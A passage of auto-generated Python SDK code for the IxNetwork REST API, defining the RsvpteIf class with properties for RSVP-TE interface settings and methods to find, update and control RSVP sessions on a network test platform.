'LabelReqRefCount': 'labelReqRefCount',
'LabelSpaceEnd': 'labelSpaceEnd',
'LabelSpaceStart': 'labelSpaceStart',
'Multiplier': 'multiplier',
'Name': 'name',
'NumberOfRestarts': 'numberOfRestarts',
'OurIp': 'ourIp',
'RecoveryTime': 'recoveryTime',
'RestartStartTime': 'restartStartTime',
'RestartUpTime': 'restartUpTime',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'SummaryRefreshInterval': 'summaryRefreshInterval',
'UseSameAuthenticationKeyForPeer': 'useSameAuthenticationKeyForPeer',
'UsingGatewayIp': 'usingGatewayIp',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(RsvpteIf, self).__init__(parent, list_op)
@property
def LearnedInfo(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo): An instance of the LearnedInfo class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo
if self._properties.get('LearnedInfo', None) is not None:
return self._properties.get('LearnedInfo')
else:
return LearnedInfo(self)
@property
def Active(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def ActualRestartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Actual Restart Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ActualRestartTime']))
@property
def AdvertisedRestartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Advertised Restart Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AdvertisedRestartTime']))
@property
def AuthenticationAlgorithm(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Algorithm
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationAlgorithm']))
@property
def AuthenticationKeyForReceivedPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key for Received Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyForReceivedPackets']))
@property
def AuthenticationKeyForSentPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key for Sent Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyForSentPackets']))
@property
def AuthenticationKeyIdentifier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key Identifier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyIdentifier']))
@property
def AutoGenerateAuthenticationKeyIdentifier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Auto Generate Authentication Key Identifier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AutoGenerateAuthenticationKeyIdentifier']))
@property
def BundleMessageThresholdTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bundle Message Threshold Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BundleMessageThresholdTime']))
@property
def CheckIntegrityForReceivedPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Check Integrity for Received Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CheckIntegrityForReceivedPackets']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DutIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): DUT IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DutIp']))
@property
def EnableBfdRegistration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable BFD Registration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBfdRegistration']))
@property
def EnableBundleMessageSending(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Bundle Message Sending
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBundleMessageSending']))
@property
def EnableBundleMessageThresholdTimer(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Bundle Message Threshold Timer
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBundleMessageThresholdTimer']))
@property
def EnableGracefulRestartHelperMode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Helper-Mode
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableGracefulRestartHelperMode']))
@property
def EnableGracefulRestartRestartingMode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Restarting-Mode
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableGracefulRestartRestartingMode']))
@property
def EnableHelloExtension(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Hello Extension
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableHelloExtension']))
@property
def EnableRefreshReduction(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Refresh Reduction
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableRefreshReduction']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def GenerateSequenceNumberBasedOnRealTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Generate Sequence Number Based on Real Time
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenerateSequenceNumberBasedOnRealTime']))
@property
def HandshakeRequired(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Handshake Required
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HandshakeRequired']))
@property
def HelloInterval(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Interval (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloInterval']))
@property
def HelloTimeoutMultiplier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Timeout Multiplier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloTimeoutMultiplier']))
@property
def InitialSequenceNumber(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Initial Sequence Number
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InitialSequenceNumber']))
@property
def LabelReqRefCount(self):
# type: () -> int
"""
Returns
-------
- number: Number of Label Req in RSVP-TE DG
"""
return self._get_attribute(self._SDM_ATT_MAP['LabelReqRefCount'])
@LabelReqRefCount.setter
def LabelReqRefCount(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['LabelReqRefCount'], value)
@property
def LabelSpaceEnd(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label Space End
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelSpaceEnd']))
@property
def LabelSpaceStart(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label Space Start
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelSpaceStart']))
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NumberOfRestarts(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Number of Restarts
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NumberOfRestarts']))
@property
def OurIp(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): Local IP
"""
return self._get_attribute(self._SDM_ATT_MAP['OurIp'])
@property
def RecoveryTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Recovery Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RecoveryTime']))
@property
def RestartStartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Restart Start Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RestartStartTime']))
@property
def RestartUpTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Restart Up Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RestartUpTime']))
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
        - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def SummaryRefreshInterval(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Summary Refresh Interval (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SummaryRefreshInterval']))
@property
def UseSameAuthenticationKeyForPeer(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Use Same Authentication Key for Peer
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UseSameAuthenticationKeyForPeer']))
@property
def UsingGatewayIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Using Gateway IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UsingGatewayIp']))
def update(self, ConnectedVia=None, LabelReqRefCount=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, int, str, List[str]) -> RsvpteIf
"""Updates rsvpteIf resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, LabelReqRefCount=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, int, str, List[str]) -> RsvpteIf
"""Adds a new rsvpteIf resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Returns
-------
- self: This instance with all currently retrieved rsvpteIf resources using find and the newly added rsvpteIf resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained rsvpteIf resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, LabelReqRefCount=None, Multiplier=None, Name=None, OurIp=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves rsvpteIf resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve rsvpteIf resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all rsvpteIf resources from the server.
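        For example (illustrative), find(Name='^rsvp-te neighbors$') retrieves only the resources whose Name matches exactly.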
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- OurIp (list(str)): Local IP
        - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns
-------
- self: This instance with matching rsvpteIf resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of rsvpteIf data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the rsvpteIf resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
        Abort CPF control plane (equivalent to demoting to the kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def GetLearnedInfo(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the getLearnedInfo operation on the server.
Get Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getLearnedInfo(async_operation=bool)
------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(SessionIndices=list, async_operation=bool)
---------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(SessionIndices=string, async_operation=bool)
-----------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(Arg2=list, async_operation=bool)list
---------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getLearnedInfo', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def RestartNeighbor(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the restartNeighbor operation on the server.
Restart Neighbor
restartNeighbor(Arg2=list, async_operation=bool)list
----------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartNeighbor', payload=payload, response_object=None)
def RsvpRestartNeighbor(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpRestartNeighbor operation on the server.
Gracefully restart selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpRestartNeighbor(async_operation=bool)
-----------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpRestartNeighbor(SessionIndices=list, async_operation=bool)
--------------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpRestartNeighbor(SessionIndices=string, async_operation=bool)
----------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpRestartNeighbor', payload=payload, response_object=None)
def RsvpResumeHello(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpResumeHello operation on the server.
Resume sending Hello messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpResumeHello(async_operation=bool)
-------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpResumeHello(SessionIndices=list, async_operation=bool)
----------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpResumeHello(SessionIndices=string, async_operation=bool)
------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpResumeHello', payload=payload, response_object=None)
def RsvpStartSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStartSRefresh operation on the server.
Start sending SRefresh messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStartSRefresh(async_operation=bool)
---------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStartSRefresh(SessionIndices=list, async_operation=bool)
------------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStartSRefresh(SessionIndices=string, async_operation=bool)
--------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStartSRefresh', payload=payload, response_object=None)
def RsvpStopHello(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStopHello operation on the server.
Stop sending Hello messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStopHello(async_operation=bool)
-----------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopHello(SessionIndices=list, async_operation=bool)
--------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopHello(SessionIndices=string, async_operation=bool)
----------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStopHello', payload=payload, response_object=None)
def RsvpStopSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStopSRefresh operation on the server.
Stop sending SRefresh messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStopSRefresh(async_operation=bool)
--------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopSRefresh(SessionIndices=list, async_operation=bool)
-----------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopSRefresh(SessionIndices=string, async_operation=bool)
-------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStopSRefresh', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
        Start CPF control plane (equivalent to promoting to the negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def StartHello(self, *args, **kwargs):
